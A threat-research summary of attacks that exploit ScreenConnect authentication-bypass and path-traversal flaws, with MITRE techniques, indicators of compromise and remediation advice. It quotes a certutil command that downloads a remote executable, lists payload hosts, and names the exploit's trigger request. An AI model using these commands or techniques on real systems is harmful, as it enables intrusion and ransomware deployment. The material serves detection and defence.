Threat Research

ConnectWise ScreenConnect attacks deliver malware

Sophos

Sophos observed active exploitation of authentication-bypass and path-traversal vulnerabilities in on-premises ConnectWise ScreenConnect servers, which attackers used to deploy web shells, remote access tools, stealers, and multiple ransomware families. Immediate patching to ScreenConnect 23.9.8+, investigation for implanted web shells or new accounts, and scanning for known IOCs are recommended. #ConnectWiseScreenConnect #LockBit

Keypoints

  • Two critical vulnerabilities (CVE-2024-1709 auth bypass and CVE-2024-1708 path traversal) affect older ScreenConnect server versions and were fixed in 23.9.8; self-hosted instances remain at risk until patched.
  • Proof-of-concept exploit code and widespread exploitation were observed; attackers added accounts, deployed web shells, and pushed malware from compromised servers to many endpoints.
  • Observed payloads delivered via exploited ScreenConnect include LockBit-derived ransomware (identified by a recurring SHA-256), AsyncRAT, Vidar/Redline stealer, Cobalt Strike beacons, Xworm, Rust-based infostealer (Redcap), and custom RATs (e.g., patch3.exe).
  • Attack techniques included using certutil/PowerShell to download payloads, executing installers via msiexec, creating scheduled tasks and registry persistence, and attempting to disable endpoint protection and add Cloudflare Tunnel backdoors.
  • Recommended actions: take vulnerable on-prem servers offline until patched, inspect ScreenConnectUser.xml and App_Extensions for new accounts/web shells, scan for temporary/trash files and suspicious downloads, and deploy endpoint/XDR protections and IDS rules.
  • Sophos published XDR queries, detection rule names, and SFOS/EPIPS signatures to help hunting and automated detection of ScreenConnect exploitation and post-exploitation activity.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Attackers exploited unpatched ScreenConnect servers: (‘attacks targeting unpatched ConnectWise ScreenConnect installations’).
  • [T1136] Create Account – Exploit/PoC added new users on compromised systems: (‘PoC code was released on GitHub that exploits these vulnerabilities and adds a new user to the compromised system’).
  • [T1505.003] Web Shell – Attackers implanted web shells in server extensions or other locations for persistent access: (‘Assume that any machines hosting a ScreenConnect server could have one or more implanted web shells’).
  • [T1105] Ingress Tool Transfer – Use of certutil to download payloads from remote servers to disk: (‘certutil -urlcache -f http:///svchost.exe c:svchost.exe’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Execution of installers and ransomware through msiexec/cmd chains: (‘services.exe -> msiexec.exe -> … crypt64ult.exe’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell invoked to download and run Cobalt Strike beacons and perform reconnaissance: (‘.cmd tried to launch PowerShell to use it to download the beacon’).
  • [T1082] System Information Discovery – Adversaries ran local discovery commands (ipconfig, whoami, get-localuser) to enumerate hosts and accounts: (‘getlocaluser (to obtain a list of local user accounts on the server) and ipconfig’).
  • [T1562] Impair Defenses – Attempts to disable Sophos endpoint protection and modify security controls were observed: (‘they first attempted to disable Sophos endpoint protection’).
  • [T1053] Scheduled Task/Job – Creation of persistent scheduled tasks to download payloads (task named “Windows update”): (‘created a persistent task named “Windows update” that attempted to download a payload from sc.ksfe.workers[.]dev’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Registry edits to enable RDP and persistence modifications were attempted: (‘attempted to make edits to the server’s Windows Registry to enable Remote Desktop Protocol access’).

Indicators of Compromise

  • [File Hash] ransomware sample – SHA-256 2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a (LockBit-builder variant), and another payload hash a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0.
  • [File Hash] stealer sample – SHA-256 c94038781c56ab85d2f110db4f45b86ccf269e77a3ff4b9133b96745ff97d25f (Vidar/Redline).
  • [Filenames/Paths] common payload locations – WindowsTempScreenConnect23.9.6.8787upd.exe, WindowsTempScreenConnect23.9.6.8787enc.exe, userstempenc.exe, and C:svchost.exe (downloaded via certutil).
  • [Filenames] installer/persistent RAT names – patch3.exe (Safe Mode RAT), first.exe (SimpleHelp installer), crypt64ult.exe (ransomware payload), and ScreenConnect.exe/ScreenConnect.ClientService.exe.
  • [Domain/URL] C2 / download hosts – sc.ksfe.workers[.]dev (scheduled-task download), and examples of remote IP-hosted payloads such as http:///svchost.exe and http://:8084/msappdata.msi.
  • [Artifacts] config/log indicators – modifications to ScreenConnect User.xml and presence of .ASPX/.ASHX files in App_Extensions (possible webshells) and temporary user XML files indicating exploit activity.

Attackers exploited two server-side ScreenConnect flaws (CVE-2024-1709 auth bypass and CVE-2024-1708 path traversal) to gain initial access, create accounts, and write webshells or installers into ScreenConnect directories. They used built-in Windows utilities (certutil, msiexec, PowerShell, cmd) to fetch and run payloads from remote hosts; observed payloads included a LockBit-builder ransomware (recurring SHA-256), Vidar/Redline stealer, AsyncRAT, Cobalt Strike beacons, Xworm, Rust-based infostealer (Redcap), and bespoke RATs like patch3.exe which install persistence even in Safe Mode.

Practical remediation and hunting steps: immediately isolate or take offline any on-prem ScreenConnect servers running versions prior to 23.9.8, upgrade to 23.9.8+, and assume compromise until inspected. Investigate ScreenConnectApp_DataUser.xml and App_Extensions for newly created accounts, .ASPX/.ASHX files or webshells; search Temp and ScreenConnect extension folders for enc.exe/upd.exe/first.exe/patch3.exe, check scheduled tasks (e.g., task named “Windows update”), registry Run keys, and evidence of certutil/PowerShell downloads and msiexec installer chains; apply XDR/IDS detections and endpoint protections to block known exploit scripts and payload behaviors.

For detection, query telemetry for ScreenConnect server versions, ScreenConnect relay IPs, IIS logs showing SetupWizard.aspx hits with a trailing slash, shells spawned from ScreenConnect processes, and temporary user file creation timestamps; deploy the provided Sophos XDR queries, enable IDS/EPIPS SIDs (2309339/2309343/2309344), and run offline scans to remove any implanted web shells or unauthorized accounts prior to reconnecting servers to production.

Read more: https://news.sophos.com/en-us/2024/02/23/connectwise-screenconnect-attacks-deliver-malware/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint